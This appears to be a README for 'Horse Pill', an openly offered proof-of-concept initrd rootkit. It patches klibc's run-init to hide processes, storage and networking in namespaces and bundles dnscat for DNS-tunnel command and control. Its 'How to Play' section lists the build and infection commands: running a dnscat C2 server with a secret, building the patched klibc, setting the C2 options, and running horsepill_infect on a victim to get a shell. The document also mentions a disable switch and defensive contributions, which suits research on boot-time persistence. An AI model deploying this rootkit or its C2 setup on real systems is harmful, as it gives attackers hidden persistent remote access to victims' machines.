Horse Pill is a PoC of a ramdisk based containerizing root kit. It resides inside the initrd, and prior to the actual init running, it puts it into a mount and pid namespace that allows it to run covert processes and covert storage. This also allows it run covert networking systems, such as dns tunnels.
The Moving Parts
There are essentially 3 moving parts here.
This is patch to klibc, which provides run-init, which on modern Ubuntu systems runs the real init, systemd. This patches in the rootkit functionality, making a malicious run-init. This binary has a new section called DNSCMDLINE, which provides the command line options to dnscat, which is bundled within the patch.
This script takes in command-line arguments and puts them into the section referred to above.
This will takes the file to splat over run-init while assembling ramdisks as a command line argument. It then calls update-initramfs and splats over the run-init as the ramdisks is being assembled.
How to Play
- Set up your dns records for the command and control box as directed by the dnscat2 documentation
- Get a server on the internet and run the dnscat server on it
ruby dnscat.rb --secret=<secret> some.domain.name
- Grab the source for klibc on your attack system. If apt complains that you don't have source repositories, fix it
sudo apt-get build-dep klibc && apt-get source klibc
cd klibc-2.xx && quilt import klibc-horsepill.patch && dpkg-buildpackage -j$(nproc) -us -uc
- Take that binary and set your options
horsepill_setopt path/to/klibc/source/package/usr/kinit/shared/run-init dsncat --secret=<secret> some.domain.name
- Copy malicious run-init to victim and horsepill_infect and run
horsepill_infect run-init ``` 7. Reboot victim 8. ??? 9. Enjoy your shell 10. Disable on victim by adding "horsepill=0" to kernel command line at boot
Pull requests reviewed and accepted. Rather than contributing directly to this project, why not contribute to distros and stop them from assembling ramdisks on most systems. Or contribute to systemd to detect this as a type of containment. Or perhaps to chrootkit.
This was developed by Michael Leibowitz (@r00tkillah)
All parts are licensed BSD. Klibc is actually dual licensed depending on the part of klibc, but the usr components are BSD licensed. dnscat2 is also BSD licensed. Both components have their licenses here as well as klibc-usr-LICENSE.md and danscat2-LICENSE.md. The combination is covered under the LICENSE.md
Thanks Ron Bowes, the developer of dnscat2 for his fine tool.